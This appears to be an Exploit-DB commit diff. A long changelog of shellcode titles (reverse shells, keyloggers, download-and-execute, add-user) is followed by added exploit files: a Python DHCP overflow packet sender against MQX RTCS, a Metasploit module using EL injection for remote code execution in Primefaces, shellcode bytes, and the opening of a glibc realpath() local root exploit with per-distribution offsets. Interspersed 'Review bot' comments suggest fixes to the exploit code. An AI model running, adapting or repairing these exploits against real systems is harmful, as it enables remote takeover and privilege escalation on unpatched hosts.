Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)

Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows XP < 10 - Download File + Execute Shellcode
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Windows/x86 - system(systeminfo) Shellcode (224 bytes)
Windows (XP < 10) - Download File + Execute Shellcode
Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)

Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)
Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)

Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)

OSX/PPC - Stager Sock Find MSG_PEEK Shellcode
OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode

OSX/PPC - execve(/bin/sh) Shellcode
OSX/PPC - execve(/bin/sh) + Null-Free Shellcode

Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)
Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)
Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)
Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)
Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86 - Egghunter Shellcode (38 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)
Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)
Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)
Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)
Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)
Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)
Linux/x86 - Uzumaki Encryptor Shellcode (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)
Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)
Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)
Linux/x86 - Bind TCP Shell Shellcode (112 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)
Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)
Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)
Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)
Windows/x86 - Create Admin User (X) Shellcode (304 bytes)
Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)
Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)
Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)
Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)
Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)
Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)
Windows/x86 - Message Box + Null-Free Shellcode (140 bytes)
Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)
Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)
Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)
Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)
Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)
Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)

Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)

Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)
Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows/x86 - Hide Console Window Shellcode (182 bytes)

Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)

Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)
Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)

Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)

Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)
Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)

Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)

Windows 10 x64 - Egghunter Shellcode (45 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)

Linux/x86 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)

Windows x86/x64 - cmd.exe Shellcode (718 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)

Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)

Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)

Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)

Windows x64 - API Hooking Shellcode (117 bytes)
Windows/x86-64 - API Hooking Shellcode (117 bytes)
Offensive Security 2018-01-19 05:01:43 +00:00
parent 1db36d5e8b
commit 8a2e4ff27a
57 changed files with 4507 additions and 286 deletions


@ -3,7 +3,7 @@
############################################################
# Target - The Includer CGI <= 1.0 #
# #
# Based on - http://www.milw0rm.com/id.php?id=862 #
# Based on - http://www.milw0rm.com/id.php?id=862 (https://www.exploit-db.com/exploits/862/) #
# #
# Info about bug - Stupid use "Open" function. #
# #
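Review bot: the rewritten "Based on" row in the banner box is now much wider than the 60-character "#" border above it, so its closing "#" no longer lines up with the other rows. Put the exploit-db.com URL on its own "# Based on - ..." row inside the box instead of appending it in parentheses, so every row stays within the border width.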

63
exploits/hardware/dos/43776.py Executable file

@ -0,0 +1,63 @@
#!/usr/bin/python3
"""PoC for MQX RTCS code execution via DHCP options overflow.
This is just a quick hack to prove the vulnerability and was designed to run
on a private network with the target device.
"""
import datetime
import socket
def main():
"""Use a default valid DHCP packet to overwrite an event function pointer."""
execute_addr = 0xFFFFFFFF
exploit_pkt = bytearray.fromhex(' \
02 01 06 00 a5 d3 0b 2f 00 00 80 00 00 00 00 00 \
ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff \
ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 63 82 53 63 \
35 01 02 36 04 ff ff ff ff 01 04 ff ff ff 00 43 \
98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \
00 00 00 00 00 ff ff ff ff ff')
exploit_pkt[0x195:0x199] = execute_addr.to_bytes(4, byteorder='big')
recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind(('', 67))
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
send_sock.bind(('', 68))
send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
send_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
print("{}: Waiting for DHCP packet...".format(datetime.datetime.now()))
# Transaction IDs need to match else RTCS will throw out the packet.
data = recv_sock.recvfrom(1024)[0]
exploit_pkt[4:8] = data[4:8]
send_sock.sendto(exploit_pkt, ('<broadcast>', 68))
print("{}: Transmitted 0x{:X} PC redirection packet.".format(
datetime.datetime.now(), execute_addr))
if __name__ == "__main__":
main()
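Review bot: the module docstring calls this a PoC for "code execution", but the file is added under exploits/hardware/dos/ and execute_addr is left at 0xFFFFFFFF, so the header and the filing disagree about impact. State which of the two this script demonstrates, and name the affected product and firmware version in the docstring so a reader knows what to patch or isolate. Two smaller points in the socket setup: SO_REUSEADDR is set on send_sock after bind(), where it no longer affects that bind, and the loop answers every datagram that arrives on UDP 67 with a broadcast without looking at the sender, so the "private network" remark in the docstring should be written as a hard requirement rather than a design note.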

156
exploits/java/webapps/43733.rb Executable file

@ -0,0 +1,156 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
'Description' => %q{
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
},
'Author' => [ 'Bjoern Schuette' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', 'CVE-2017-1000486'],
['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],
['URL', 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'],
['URL', 'http://schuette.se/2018/01/16/in-your-primeface/']
],
'Privileged' => true,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate' => 'Feb 15 2016',
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'Arch' => ARCH_CMD,
'Targets' => [
[
'Universal', {
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'Arch' => [ ARCH_CMD ],
},
],
],
'DefaultTarget' => 0))
register_options([
Opt::RPORT(80),
OptString.new('PASSWORD', [ true , "The password to login", 'primefaces']),
OptString.new('TARGETURI', [true, 'The base path to primefaces', '/javax.faces.resource/dynamiccontent.properties.xhtml']) ,
OptString.new('CMD', [ false , "Command to execute", '']),
])
end
def encrypt_el(password, payload)
salt = [0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03].pack('c*')
iterationCount = 19
cipher = OpenSSL::Cipher.new("DES")
cipher.encrypt
cipher.pkcs5_keyivgen password, salt, iterationCount
ciphertext = cipher.update payload
ciphertext << cipher.final
return ciphertext
end
def http_send_command(cmd, payloadEL)
uri = normalize_uri(target_uri.path)
encrypted_payload = encrypt_el(datastore['PASSWORD'], payloadEL)
encrypted_payload_base64 = Rex::Text.encode_base64(encrypted_payload)
encrypted_payload_base64_url_encoded = Rex::Text.uri_encode(encrypted_payload_base64)
# send the payload and execute command
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'pfdrt' => 'sc',
'ln' => 'primefaces',
'pfdrid' => encrypted_payload_base64_url_encoded
}
})
if res.nil?
vprint_error("Connection timed out")
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
end
if res && res.headers && (res.code == 302 || res.code == 200)
print_good("HTTP return code #{res.code}")
else
vprint_error(res.body)
fail_with(Failure::Unknown, "#{peer} - Unknown error during execution")
end
return res
end
def exploit
cmd=""
if not datastore['CMD'].empty?
cmd = datastore['CMD']
else
cmd = payload.encoded
end
payloadEL = '${facesContext.getExternalContext().getResponse().setContentType("text/plain;charset=\"UTF-8\"")}'
payloadEL << '${session.setAttribute("scriptfactory","".getClass().forName("javax.script.ScriptEngineManager").newInstance())}'
payloadEL << '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
payloadEL << '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
payloadEL << '${session.getAttribute("scriptengine").eval('
payloadEL << '"var os = java.lang.System.getProperty(\"os.name\");'
payloadEL << 'var proc = null;'
payloadEL << 'os.toLowerCase().contains(\"win\")? '
payloadEL << 'proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/C\",\"%s\"]).start()' % cmd
payloadEL << ' : proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"%s\"]).start();' % cmd
payloadEL << 'var is = proc.getInputStream();'
payloadEL << 'var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\";'
payloadEL << 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);")}'
payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().flush()}'
payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().close()}';
vprint_status("Attempting to execute: #{cmd}")
resp = http_send_command(cmd, payloadEL)
print_line(resp.body.to_s)
m = resp.body.to_s
if m.empty?
print_error("This server may not be vulnerable")
end
return
end
def check
var_a = rand_text_alpha_lower(4)
payloadEL = "${facesContext.getExternalContext().setResponseHeader(\"primesecretchk\", %s" % var_a
res = http_send_command(var_a, payloadEL)
if res.headers
if res.headers["primesecretchk"] == #{var_a}
vprint_good("Victim evaluates EL expressions")
return Exploit::CheckCode::Vulnerable
end
else
vprint_error("Unable to determine due to a HTTP connection timeout")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
end
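Review bot: in check, the line if res.headers["primesecretchk"] == #{var_a} does not interpolate anything, because #{...} only works inside a double-quoted string. Here the # starts a comment, the == takes the vprint_good(...) call on the following line as its right-hand side, and the result no longer depends on the random marker, so the method can report Vulnerable for a host that never echoed it. Compare against var_a directly. The EL string built two lines earlier is also never closed (no closing quote, parenthesis or brace after %s), so the header it is supposed to set cannot be relied on either. Separately, http_send_command already calls fail_with when res is nil, so the else branch that returns CheckCode::Unknown cannot be reached on a timeout, and the Description attributes the flaw to a padding oracle while encrypt_el simply encrypts with the default PASSWORD value; the text should say which condition the module actually depends on, since that is what someone triaging exposure needs to know.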


@ -5,7 +5,7 @@
#include <unistd.h>
#include <stdlib.h>
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */
char shellcode[]=
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"


@ -0,0 +1,977 @@
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2018 halfdog <me (%) halfdog.net>
* See https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ for more information.
*
* This tool exploits a buffer underflow in glibc realpath()
* and was tested against latest release from Debian, Ubuntu
* Mint. It is intended as demonstration of ASLR-aware exploitation
* techniques. It uses relative binary offsets, that may be different
* for various Linux distributions and builds. Please send me
* a patch when you developed a new set of parameters to add
* to the osSpecificExploitDataList structure and want to contribute
* them.
*
* Compile: gcc -o RationalLove RationalLove.c
* Run: ./RationalLove
*
* You may also use "--Pid" parameter, if you want to test the
* program on already existing namespaced or chrooted mounts.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <poll.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define UMOUNT_ENV_VAR_COUNT 256
/** Dump that number of bytes from stack to perform anti-ASLR.
* This number should be high enough to reproducible reach the
* stack region sprayed with (UMOUNT_ENV_VAR_COUNT*8) bytes of
* environment variable references but low enough to avoid hitting
* upper stack limit, which would cause a crash.
*/
#define STACK_LONG_DUMP_BYTES 4096
char *messageCataloguePreamble="Language: en\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n";
/** The pid of a namespace process with the working directory
* at a writable /tmp only visible by the process. */
pid_t namespacedProcessPid=-1;
int killNamespacedProcessFlag=1;
/** The pathname to the umount binary to execute. */
char *umountPathname;
/** The pathname to the named pipe, that will synchronize umount
* binary with supervisory process before triggering the second
* and last exploitation phase.
*/
char *secondPhaseTriggerPipePathname;
/** The pathname to the second phase exploitation catalogue file.
* This is needed as the catalogue cannot be sent via the trigger
* pipe from above.
*/
char *secondPhaseCataloguePathname;
/** The OS-release detected via /etc/os-release. */
char *osRelease=NULL;
/** This table contains all relevant information to adapt the
* attack to supported Linux distros (fully updated) to support
* also older versions, hash of umount/libc/libmount should be
* used also for lookups.
* The 4th string is an array of 4-byte integers with the offset
* values for format string generation. Values specify:
* * Stack position (in 8 byte words) for **argv
* * Stack position of argv[0]
* * Offset from __libc_start_main return position from main()
* and system() function, first instruction after last sigprocmask()
* before execve call.
*/
#define ED_STACK_OFFSET_CTX 0
#define ED_STACK_OFFSET_ARGV 1
#define ED_STACK_OFFSET_ARG0 2
#define ED_LIBC_GETDATE_DELTA 3
#define ED_LIBC_EXECL_DELTA 4
static char* osSpecificExploitDataList[]={
// Debian Stretch
"\"9 (stretch)\"",
"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
"from_archive",
// Delta for Debian Stretch "2.24-11+deb9u1"
"\x06\0\0\0\x24\0\0\0\x3e\0\0\0\x7f\xb9\x08\x00\x4f\x86\x09\x00",
// Ubuntu Xenial libc=2.23-0ubuntu9
"\"16.04.3 LTS (Xenial Xerus)\"",
"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
"_nl_load_locale_from_archive",
"\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
// Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"
"\"18.3 (Sylvia)\"",
"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A",
"_nl_load_locale_from_archive",
"\x07\0\0\0\x26\0\0\0\x40\0\0\0\xd0\xf5\x09\x00\xf0\xc1\x0a\x00",
NULL};
char **osReleaseExploitData=NULL;
/** Locate the umount binary within the given search path list,
* elements separated by colons.
* @return a pointer to a malloced memory region containing the
* string or NULL if not found.
*/
char* findUmountBinaryPathname(char *searchPath) {
char *testPathName=(char*)malloc(PATH_MAX);
assert(testPathName);
while(*searchPath) {
char *endPtr=strchr(searchPath, ':');
int length=endPtr-searchPath;
if(!endPtr) {
length=strlen(searchPath);
endPtr=searchPath+length-1;
}
int result=snprintf(testPathName, PATH_MAX, "%.*s/%s", length,
searchPath, "umount");
if(result>=PATH_MAX) {
fprintf(stderr, "Binary search path element too long, ignoring it.\n");
} else {
struct stat statBuf;
result=stat(testPathName, &statBuf);
// Just assume, that umount is owner-executable. There might be
// alternative ACLs, which grant umount execution only to selected
// groups, but it would be unusual to have different variants
// of umount located searchpath on the same host.
if((!result)&&(S_ISREG(statBuf.st_mode))&&(statBuf.st_mode&S_IXUSR)) {
return(testPathName);
}
}
searchPath=endPtr+1;
}
free(testPathName);
return(NULL);
}
/** Get the value for a given field name.
* @return NULL if not found, a malloced string otherwise.
*/
char* getReleaseFileField(char *releaseData, int dataLength, char *fieldName) {
int nameLength=strlen(fieldName);
while(dataLength>0) {
char *nextPos=memchr(releaseData, '\n', dataLength);
int lineLength=dataLength;
if(nextPos) {
lineLength=nextPos-releaseData;
nextPos++;
} else {
nextPos=releaseData+dataLength;
}
if((!strncmp(releaseData, fieldName, nameLength))&&
(releaseData[nameLength]=='=')) {
return(strndup(releaseData+nameLength+1, lineLength-nameLength-1));
}
releaseData=nextPos;
dataLength-=lineLength;
}
return(NULL);
}
/** Detect the release by reading the VERSION field from /etc/os-release.
* @return 0 on success.
*/
int detectOsRelease() {
int handle=open("/etc/os-release", O_RDONLY);
if(handle<0)
return(-1);
char *buffer=alloca(1024);
int infoLength=read(handle, buffer, 1024);
close(handle);
if(infoLength<0)
return(-1);
osRelease=getReleaseFileField(buffer, infoLength, "VERSION");
if(!osRelease)
osRelease=getReleaseFileField(buffer, infoLength, "NAME");
if(osRelease) {
fprintf(stderr, "Detected OS version: %s\n", osRelease);
return(0);
}
return(-1);
}
/** Create the catalogue data in memory.
* @return a pointer to newly allocated catalogue data memory
*/
char* createMessageCatalogueData(char **origStringList, char **transStringList,
int stringCount, int *catalogueDataLength) {
int contentLength=strlen(messageCataloguePreamble)+2;
for(int stringPos=0; stringPos<stringCount; stringPos++) {
contentLength+=strlen(origStringList[stringPos])+
strlen(transStringList[stringPos])+2;
}
int preambleLength=(0x1c+0x14*(stringCount+1)+0xc)&-0xf;
char *catalogueData=(char*)malloc(preambleLength+contentLength);
memset(catalogueData, 0, preambleLength);
int *preambleData=(int*)catalogueData;
*preambleData++=0x950412de;
preambleData++;
*preambleData++=stringCount+1;
*preambleData++=0x1c;
*preambleData++=(*(preambleData-2))+(stringCount+1)*sizeof(int)*2;
*preambleData++=0x5;
*preambleData++=(*(preambleData-3))+(stringCount+1)*sizeof(int)*2;
char *nextCatalogueStringStart=catalogueData+preambleLength;
for(int stringPos=-1; stringPos<stringCount; stringPos++) {
char *writeString=(stringPos<0)?"":origStringList[stringPos];
int length=strlen(writeString);
*preambleData++=length;
*preambleData++=(nextCatalogueStringStart-catalogueData);
memcpy(nextCatalogueStringStart, writeString, length+1);
nextCatalogueStringStart+=length+1;
}
for(int stringPos=-1; stringPos<stringCount; stringPos++) {
